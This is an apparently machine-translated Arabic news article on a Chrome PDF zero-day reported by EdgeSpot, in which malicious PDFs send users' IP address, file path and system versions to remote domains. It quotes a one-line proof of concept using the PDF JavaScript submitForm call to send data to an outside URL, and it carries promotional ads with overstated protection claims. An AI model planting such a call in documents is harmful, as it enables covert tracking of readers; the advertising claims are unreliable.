يتيح خطأ Chrome للمتسللين جمع بيانات المستخدم عبر ملفات PDF

اكتشفت خدمة الكشف عن الاستغلال EdgeSpot أمرًا مثيرًا للاهتمام كروم ثغرة يوم الصفر تستغل مستندات PDF.

الثغرة الأمنية تسمح للمهاجمين حصاد البيانات الحساسة باستخدام مستندات PDF ضارة مفتوحة في Chrome.

بمجرد أن تفتح الضحية ملفات PDF ذات الصلة في Google Chrome ، يبدأ برنامج ضار في العمل في الخلفية من خلال جمع بيانات المستخدم.

ثم يتم إعادة توجيه البيانات إلى الخادم البعيد الذي يتحكم فيه المتسللون. قد تتساءل عن البيانات التي يمتصها المهاجمون ، فهم يستهدفون البيانات التالية على جهاز الكمبيوتر الخاص بك:

• عنوان IP
• المسار الكامل لملف PDF على النظام
• إصدارات OS و Chrome

احذر من ملفات PDF المليئة بالبرامج الضارة

خبراء مراقب هذا واحد من المجالين readnotify [.] com أو المتعاون [.] صافي كان يتلقى البيانات.

وكشفوا أن المهاجمين يستخدمون this.submitForm () واجهة برمجة تطبيقات PDF Javascript لجمع المعلومات الحساسة للمستخدمين.

اختبرناها مع الحد الأدنى من PoC ، مثل استدعاء API بسيط this.submitForm (‘ http://google.com/test’) سيجعل Google Chrome يرسل البيانات الشخصية إلى google.com.

تم استغلال خطأ Chrome هذا بواسطة مجموعتين متميزتين من ملفات PDF الضارة ، وكلاهما تم تداولهما في أكتوبر 2017 وسبتمبر 2018 ، على التوالي.

والجدير بالذكر أن البيانات التي تم جمعها يمكن أن يستخدمها المهاجمون لضبط الهجمات في المستقبل. تشير التقارير إلى أنه تم تجميع الدفعة الأولى من الملفات باستخدام خدمة تتبع ملفات PDF في ReadNotify.

يمكن للمستخدمين الاستفادة من الخدمة لتتبع وجهات نظر المستخدم. لم تشارك EdgeSpot أي تفاصيل تتعلق بطبيعة المجموعة الثانية من ملفات PDF.

نصيحة سريعة: قم بتغيير متصفحك إلى Opera

في هذه الأوقات العصيبة ، نتعرض للهجوم بالبرامج الضارة والتصيد الاحتيالي وأحصنة طروادة في كل خطوة ، لذلك يتعين علينا أن نكون أكثر يقظة ونبقى محميًا.

ونظرًا لأن هذه مشكلة خاصة بـ Chrome ، يمكنك تجنب هذا التهديد وكل الآخرين باستخدام متصفح موجه للأمان مثل أوبرا.

يأتي هذا المتصفح مع مانع إعلانات مدمج لا يزيل فقط مثل هذه الانحرافات ولكن أيضًا يمنع التحليلات النصية ، وتتبع البكسل ، وطرق جمع البيانات الخاصة بك.

وإذا كنت تريد أن تكون متأكدًا تمامًا من أنك تبتعد عن أي خطر ، فاحرص على البقاء خلف الجهاز المدمج VPN خدمة مجانية 100٪ للاستخدام لفترة غير محدودة.

أوبرا

يوفر Opera الحماية المثالية من التهديدات مع أداة حظر الإعلانات المضمنة وخدمة VPN مجانًا!

احصل عليه مجانا
زيارة الموقع

كيف يمكنني البقاء محميًا من ثغرات PDF؟

قم بتنزيل Adobe Acrobat PRO

يتطابق Adobe و Chrome بشكل جيد عندما يتعلق الأمر بمعالجة ملفات PDF. من خلال تثبيت Adobe Extension for Chrome ، يمكنك مراجعة ملفات PDF ومعالجتها حسب رغبتك دون مغادرة متصفحك المفضل.

على الرغم من هيكلها القوي ، فقد لا يتم اكتشاف البرامج الضارة المخفية في ملفات PDF إذا كنت تستخدم الإصدار القياسي من القارئ.

يوصى باستخدام الإصدار الاحترافي لضمان حمايتك والحفاظ على بياناتك بعيدًا عن المتسللين.

على الرغم من أنه ليس مجانيًا ، إلا أن السعر الذي ستدفعه صغير نوعًا ما مقابل مجموعة كبيرة من الميزات الإضافية التي ستستمتع بها بما في ذلك الأمان المعزز لملفات PDF الخاصة بك.

هناك أيضًا نسخة تجريبية مجانية مدتها 7 أيام متضمنة حتى تتمكن من تذوق تجربة Pro الكاملة قبل إجراء عملية الشراء.

برنامج Adobe Acrobat PRO

ابتعد عن البرامج الضارة عن طريق تنزيل Adobe Acrobat PRO. يحتوي على الكثير من الميزات أكثر من الإصدار المجاني ويحافظ على أمان بياناتك.

تجربة مجانية
زيارة الموقع

---

إذا كنت تريد أن تكون آمنًا أثناء تصفح الإنترنت ، فستحتاج إلى الحصول على أداة مخصصة بالكامل لتأمين شبكتك. قم بتثبيت Private Internet Access الآن وتأمين نفسك. إنه يحمي جهاز الكمبيوتر الخاص بك من الهجمات أثناء التصفح ، ويخفي عنوان IP الخاص بك ، ويمنع كل الوصول غير المرغوب فيه.

---

أرادت خدمة الكشف عن Exploit EdgeSpot تنبيه مستخدمي Chrome بشأن المخاطر المحتملة لأنه لم يكن من المتوقع إصدار التصحيح في المستقبل القريب.

أبلغت EdgeSpot Google عن الثغرة الأمنية العام الماضي ووعدت الشركة بإصدار تصحيح في أواخر أبريل.

ومع ذلك ، يمكنك التفكير في استخدام حل مؤقت للمشكلة من خلال عرض مستندات PDF المستلمة محليًا باستخدام تطبيق قارئ آخر.

بدلاً من ذلك ، يمكنك أيضًا فتح مستندات PDF الخاصة بك في Chrome عن طريق فصل أنظمتك عن الإنترنت.